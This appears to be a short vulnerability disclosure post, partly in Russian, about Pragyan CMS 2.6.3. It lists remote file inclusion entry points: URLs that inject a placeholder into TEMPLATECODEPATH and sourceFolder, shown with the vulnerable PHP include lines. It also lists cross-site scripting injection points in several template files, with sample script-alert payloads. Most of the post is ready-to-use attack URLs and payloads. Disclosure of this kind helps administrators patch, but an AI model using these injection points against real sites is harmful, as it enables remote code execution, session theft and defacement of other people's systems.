Pragyan CMS 2.6.3 Multiple Vulnerabilities Developers: sourceforge.net/projects/pragyan 1) Remote File Inclusion Need: register_globals = on http://localhost/pragyan/cms/templates/nitt2/index.php?TEMPLATECODEPATH={RFI}? http://localhost/pragyan/cms/templates/nitt3/index.php?TEMPLATECODEPATH={RFI}? http://localhost/pragyan/cms/templates/nitt4/index.php?TEMPLATECODEPATH={RFI}? http://localhost/pragyan/cms/templates/default/index.php?TEMPLATECODEPATH={RFI}? PHP: <? include_once("$TEMPLATECODEPATH/sidebar.php"); http://localhost/pragyan/cms/modules/search/search.php?sourceFolder={RFI}? PHP: $searchModuleFolder = "$sourceFolder/$moduleFolder/search"; $include_dir = "$searchModuleFolder/include"; include ("$include_dir/commonfuncs.php"); и ещё один инклуд остался с версии 2.6.2 http://localhost/pragyan/cms/modules/form.lib.php?sourceFolder={RFI}? PHP: global $sourceFolder; global $moduleFolder; require_once("$sourceFolder/$moduleFolder/form/editform.php"); 2) XSS Need: register_globals = on http://localhost/pragyan/cms/templates/acm/index.php http://localhost/pragyan/cms/templates/crystalx/index.php http://localhost/pragyan/cms/templates/blue/index.php http://localhost/pragyan/cms/templates/default/index.php http://localhost/pragyan/cms/templates/nitt2/index.php http://localhost/pragyan/cms/templates/nitt3/index.php http://localhost/pragyan/cms/templates/nitt4/index.php http://localhost/pragyan/cms/templates/prag08V2-black/index.php PHP: $TITLE = </title><script>alert('xek')</script> $TEMPLATEBROWSERPATH = "><script>alert('xek')</script> ... etc Всех переменных не пишу, так как их оч много. И думаю что код приводить не имеет смысла Пока что не весь двиг раскопал, проблемы с mod_rewrite (
